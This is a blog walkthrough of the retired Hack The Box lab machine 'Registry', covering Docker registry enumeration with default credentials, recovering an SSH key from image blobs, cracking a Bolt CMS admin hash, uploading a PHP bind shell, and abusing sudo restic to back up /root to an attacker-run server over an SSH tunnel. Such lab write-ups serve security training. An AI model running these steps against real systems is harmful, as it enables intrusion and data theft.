Hack the box(HTB) Registry writeup



Registry is a retired machine from the platform hack the box and writeups of retired machines are only allowed.

Registry is a HARD machine of worth points 40.

Hack the box registry writeup


  1. Nmap scan
  2. Enumerating webpages
  3. Exploiting docker
  4. Getting docker blobs
  5. Getting id_rsa keys
  6. Getting user.txt
  7. Enumerating
  8. Login into bolt webpage and uploading reverse shell
  9. Backing up file using rest server and getting root.txt.

Commands used

  1. nmap -sC -sV -oV
  2. gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
  3. gobuster dir -u http://docker.registry.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
  4. curl –user “admin:admin” http://docker.registry.htb/v2/bolt-image/manifests/latest
  5. ssh -i id_rsa [email protected]
  6. strings bolt.db | grep admin
  7. gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
  8. scp -i id_rsa nc [email protected]:/tmp
  9. nc 12345
  10. python -c ‘import pty; pty.spawn(“/bin/sh”)’
  11. bash -i
  12. sudo -l
  13. apt-get install restic
  14. restic init –repo writeup
  15. rest-server –path writeup –no-auth
  16. ssh -R 8000: -i id_rsa [email protected]
  17. sudo /usr/bin/restic backup -r rest:http://localhost:8000 /root
  18. restic restore 0feef7a574a2491f47aeb6ed06cdc806a9821d3f75d9d92f66561ab2a733ff19 –target /root/Desktop/htb/registry/ -r /root/Desktop/htb/registry/writeup/

Nmap Scan

Nmap 7.70 scan initiated Wed Feb  5 09:24:37 2020 as: nmap -sC -sV -oV
Nmap scan report for
Host is up (0.42s latency).
Not shown: 997 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after: 2029-05-03T21:14:35
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Wed Feb 5 09:26:38 2020 -- 1 IP address (1 host up) scanned in 120.76 seconds
Hack the  box(HTB) Registry writeup

Enumerating webpages

As I enumerate I found /bolt

Hack the  box(HTB) Registry writeup
Hack the  box(HTB) Registry writeup

Exploiting docker

But for now lets focus on Docker as we found that in nmap scan

Hack the  box(HTB) Registry writeup

When i open it .It asks for password and i simply tried admin:admin and it worked

Hack the  box(HTB) Registry writeup

I had to read the Docker docs for proceeding further.

So according to docs lets see /_catalog

And this gives us the repos in it.

Got a “bolt-image” repo

Hack the  box(HTB) Registry writeup

Getting docker blobs

After gathering some information about the docker now i knew that i can download the docker blobs.Which could give me juicy information.

So now lets try to get those

Hack the  box(HTB) Registry writeup
[email protected]:~/Desktop/htb/registry# curl --user "admin:admin" http://docker.registry.htb/v2/bolt-image/manifests/latest
"schemaVersion": 1,
"name": "bolt-image",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
"blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
"blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
"blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
"blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
"blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
"blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
"blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
"blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
"blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
"history": [
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
"v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
"v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
"v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
"v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
"v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\"/bin/bash\\"]\"]},\"throwaway\":true}"
"v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \u0026\u0026 echo 'docker' \u003e /run/systemd/container\"]}}"
"v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/\"]}}" }, { "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \t\t\u0026\u0026 echo '#!/bin/sh' \u003e /usr/sbin/policy-rc.d \t\u0026\u0026 echo 'exit 101' \u003e\u003e /usr/sbin/policy-rc.d \t\u0026\u0026 chmod +x /usr/sbin/policy-rc.d \t\t\u0026\u0026 dpkg-divert --local --rename --add /sbin/initctl \t\u0026\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \t\u0026\u0026 sed -i 's/^exit./exit 0/' /sbin/initctl \t\t\u0026\u0026 echo 'force-unsafe-io' \u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \t\t\u0026\u0026 echo 'DPkg::Post-Invoke { \\"rm -f /var/cache/apt/archives/.deb /var/cache/apt/archives/partial/.deb /var/cache/apt/.bin || true\\"; };' \u003e /etc/apt/apt.conf.d/docker-clean \t\u0026\u0026 echo 'APT::Update::Post-Invoke { \\"rm -f /var/cache/apt/archives/.deb /var/cache/apt/archives/partial/.deb /var/cache/apt/.bin || true\\"; };' \u003e\u003e /etc/apt/apt.conf.d/docker-clean \t\u0026\u0026 echo 'Dir::Cache::pkgcache \\"\\"; Dir::Cache::srcpkgcache \\"\\";' \u003e\u003e /etc/apt/apt.conf.d/docker-clean \t\t\u0026\u0026 echo 'Acquire::Languages \\"none\\";' \u003e /etc/apt/apt.conf.d/docker-no-languages \t\t\u0026\u0026 echo 'Acquire::GzipIndexes \\"true\\"; Acquire::CompressionTypes::Order:: \\"gz\\";' \u003e /etc/apt/apt.conf.d/docker-gzip-indexes \t\t\u0026\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\"false\\";' \u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
"v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
"signatures": [
"header": {
"jwk": {
"crv": "P-256",
"kty": "EC",
"x": "SyOHJcjv-eu4X_77D9pe8kI0sXaWPTxo8WiUwnGvwXE",
"y": "u_IHhlf6_3V1LMlThz5uTkN7Hte_3MKTRG8KFK08TBg"
"alg": "ES256"
"signature": "Cwt68GIS76MHRn5M1uxdF6DQkCvMpwCdcDH7BJHfZsh5fcfhRsoA5ouGM1J_CJDl1KaZakg-b4hAxWSNOS_3hw",
"protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMC0wNC0wM1QxMToxNDo1NVoifQ"

Now lets download the blob sum


Getting id_rsa keys.

I downloaded all the blobs and placed them in the folder.

After extracting the files i got many directories .

In the root directory i found .ssh file for user bolt.

And after a little enumeration i found the passphrase for the encrypted id_rsa.

So lets ssh into the machine using id_rsa key. As port 22 is open.

Before running make sure that you give permission 600 to it

chmod 600 id_rsa

Getting user.txt

Hack the  box(HTB) Registry writeup


After login into the bolt we have the user.txt

I found the in gobuster hence now i was searching for a database or config file .So went inside /var and enumerating in www found a bolt.db.

Hack the  box(HTB) Registry writeup

You can either download it with nc to ur file and then use any online .db file opener.

But i user strings cmd and found the hash for admin of the website.

[email protected]:/var/www/html/bolt/app/database$ strings bolt.db | grep admin
2020-04-03 09:10:11Logged in: admin/bolt/bolt/loginpostLogin10.10.14.4authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2020-04-03 08:55:26Logged in: admin/bolt/bolt/loginpostLogin10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2020-04-03 08:46:00Logged out: admin/bolt/bolt/logoutlogout10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":129}
2020-04-03 08:23:51Logged in: admin/bolt/bolt/loginpostLogin10.10.15.181authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
2019-10-17 14:34:52Logged in: admin/bolt/bolt/loginpostLogin10.10.14.2authentication{"file":"/src/Controller/Backend/Authentication.php","line":193}
3admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/[email protected] 09:10:1110.10.14.4Admin["files://bind.php"]["root","everyone"]

I used john to decrypt the hash and got password as “strawberry”

Now when we have creds lets find the login page.

[email protected]:~/Desktop/htb/registry# gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url:
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
2020/04/03 07:51:56 Starting gobuster
/files (Status: 301)
/tests (Status: 301)
/src (Status: 301)
/app (Status: 301)
/theme (Status: 301)
/vendor (Status: 301)
/extensions (Status: 301)
/bolt (Status: 302)

Login into bolt webpage and uploading reverse shell

I got a /bolt again and when i visited it landed me on login page.

Hack the  box(HTB) Registry writeup

Now i created a simple php reverse shell.

Hack the  box(HTB) Registry writeup
But before i do it i  needed to transfer my nc to the target machine.
scp -i id_rsa nc [email protected]:/tmp
Hack the  box(HTB) Registry writeup

If you are not familiar with Scp you can use base64 also.

Hack the  box(HTB) Registry writeup

Then we can simply copy paste on target machine and do a simple chmod +x command.

Hack the  box(HTB) Registry writeup
Hack the  box(HTB) Registry writeup
But when i tried to upload the php file but i was unable .Then I changed the main configurations.

Hack the  box(HTB) Registry writeup

So i added php in it.Once i have done everything i went to File management to upload my file.

I got errors like this many time

Hack the  box(HTB) Registry writeup

Now i have to upload the php file quickly as machine has cron jobs which will revert my changes hence i need to be fast in doing this.

Here we are using bind shell so once our .php file executes then we will run our nc(netcat).

We used bind shell because the machine is not allowing reverse shells.

On doing sudo -l i found a restic server backup with wwwdata can do .So i thought of Backing up Data to my own system using restic server.

We have to install restic server to our own machine

apt-get install restic
Hack the  box(HTB) Registry writeup

We can google and easily find how that works hence now it was time to initialize a repo.

Hack the  box(HTB) Registry writeup
[email protected]:~/Desktop/htb/registry# restic init --repo writeup
enter password for new repository:
enter password again:
created restic repository d53e9e7757 at writeup
Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.
[email protected]:~/Desktop/htb/registry# rest-server --path writeup --no-auth
Data directory: writeup
Authentication disabled
Private repositories disabled
Starting server on :8000

After initializing now we need to set the path.

Hack the  box(HTB) Registry writeup

Used –no-auth for no authentication.

Now we need to do port forwarding in order to get the backup.

Hack the  box(HTB) Registry writeup
[email protected]:~/Desktop/htb/registry# ssh -R 8000: -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Sat Apr 4 05:42:35 UTC 2020
System load: 0.0 Users logged in: 1
Usage of /: 6.5% of 61.80GB IP address for eth0:
Memory usage: 46% IP address for br-1bad9bd75d17:
Swap usage: 1% IP address for docker0:
Processes: 181
Last login: Sat Apr 4 05:00:22 2020 from
[email protected]:~$

Once we done everything now its time for backing up the data into our own machine.

Hack the  box(HTB) Registry writeup

Once we do it successfully a snapshot will be stored in our local machine and then we can just restore that.

Hack the  box(HTB) Registry writeup
[email protected]:~/Desktop/htb/registry/root# cat root.txt 
Hack the  box(HTB) Registry writeup

Thanks for reading my writeup.

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

2 thoughts on “Hack the box(HTB) Registry writeup”

Leave a Comment